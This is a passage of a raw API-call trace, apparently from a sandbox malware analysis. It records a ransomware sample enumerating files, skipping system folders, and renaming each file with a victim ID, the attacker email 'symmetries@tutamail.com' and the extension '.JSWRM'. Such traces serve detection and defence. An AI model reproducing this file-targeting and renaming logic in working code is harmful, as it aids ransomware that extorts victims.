cFileName="Roses.jpg", cAlternateFileName="")) returned 1 [0068.890] lstrcmpiW (lpString1="Roses.jpg", lpString2=".") returned 1 [0068.890] lstrcmpiW (lpString1="Roses.jpg", lpString2="..") returned 1 [0068.890] lstrcmpiW (lpString1="Roses.jpg", lpString2="...") returned 1 [0068.890] lstrcmpiW (lpString1="Roses.jpg", lpString2="windows") returned -1 [0068.890] lstrcmpiW (lpString1="Roses.jpg", lpString2="recovery") returned 1 [0068.890] lstrcmpiW (lpString1="Roses.jpg", lpString2="perflogs") returned 1 [0068.890] lstrcmpiW (lpString1="Roses.jpg", lpString2="documents and settings") returned 1 [0068.890] lstrcmpiW (lpString1="Roses.jpg", lpString2="$RECYCLE.BIN") returned 1 [0068.890] lstrcmpiW (lpString1="Roses.jpg", lpString2="system volume information") returned -1 [0068.890] lstrcmpiW (lpString1="Roses.jpg", lpString2="msocache") returned 1 [0068.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0068.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.jpg", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Roses.jpg", lpUsedDefaultChar=0x0) returned 9 [0068.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0068.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.jpg", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Roses.jpg", lpUsedDefaultChar=0x0) returned 9 [0068.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.890] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.891] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9454425611678720) returned 0 [0068.891] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.891] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.891] CloseHandle (hObject=0xffffffff) returned 1 [0068.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0068.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0068.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0068.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0068.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0068.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.892] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0068.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.892] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Shades of Blue.htm", cAlternateFileName="")) returned 1 [0068.892] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2=".") returned 1 [0068.892] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="..") returned 1 [0068.892] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="...") returned 1 [0068.892] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="windows") returned -1 [0068.892] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="recovery") returned 1 [0068.892] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="perflogs") returned 1 [0068.892] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="documents and settings") returned 1 [0068.892] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="$RECYCLE.BIN") returned 1 [0068.892] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="system volume information") returned -1 [0068.892] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="msocache") returned 1 [0068.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shades of Blue.htm", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0068.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shades of Blue.htm", cchWideChar=18, lpMultiByteStr=0x241100, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shades of Blue.htm", lpUsedDefaultChar=0x0) returned 18 [0068.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shades of Blue.htm", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0068.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shades of Blue.htm", cchWideChar=18, lpMultiByteStr=0x240ef8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shades of Blue.htm", lpUsedDefaultChar=0x0) returned 18 [0068.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0068.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.893] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.895] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10078810777311688) returned 0 [0068.895] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.895] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.895] CloseHandle (hObject=0xffffffff) returned 1 [0068.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0068.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0068.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0068.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0068.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0068.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0068.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.895] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0068.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0068.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.895] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ShadesOfBlue.jpg", cAlternateFileName="")) returned 1 [0068.895] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2=".") returned 1 [0068.896] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="..") returned 1 [0068.896] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="...") returned 1 [0068.896] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="windows") returned -1 [0068.896] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="recovery") returned 1 [0068.896] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="perflogs") returned 1 [0068.896] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="documents and settings") returned 1 [0068.896] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="$RECYCLE.BIN") returned 1 [0068.896] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="system volume information") returned -1 [0068.896] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="msocache") returned 1 [0068.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShadesOfBlue.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0068.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShadesOfBlue.jpg", cchWideChar=16, lpMultiByteStr=0x241178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShadesOfBlue.jpg", lpUsedDefaultChar=0x0) returned 16 [0068.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShadesOfBlue.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0068.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShadesOfBlue.jpg", cchWideChar=16, lpMultiByteStr=0x240f48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShadesOfBlue.jpg", lpUsedDefaultChar=0x0) returned 16 [0068.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0068.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0068.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0068.896] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.897] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10076646113794000) returned 0 [0068.897] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.897] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.897] CloseHandle (hObject=0xffffffff) returned 1 [0068.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0068.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0068.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0068.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.897] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0068.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0068.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.898] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Soft Blue.htm", cAlternateFileName="")) returned 1 [0068.898] lstrcmpiW (lpString1="Soft Blue.htm", lpString2=".") returned 1 [0068.898] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="..") returned 1 [0068.898] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="...") returned 1 [0068.898] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="windows") returned -1 [0068.898] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="recovery") returned 1 [0068.898] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="perflogs") returned 1 [0068.898] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="documents and settings") returned 1 [0068.898] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="$RECYCLE.BIN") returned 1 [0068.898] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="system volume information") returned -1 [0068.898] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="msocache") returned 1 [0068.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Soft Blue.htm", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0068.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Soft Blue.htm", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Soft Blue.htm", lpUsedDefaultChar=0x0) returned 13 [0068.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0068.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Soft Blue.htm", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0068.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Soft Blue.htm", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Soft Blue.htm", lpUsedDefaultChar=0x0) returned 13 [0068.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0068.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 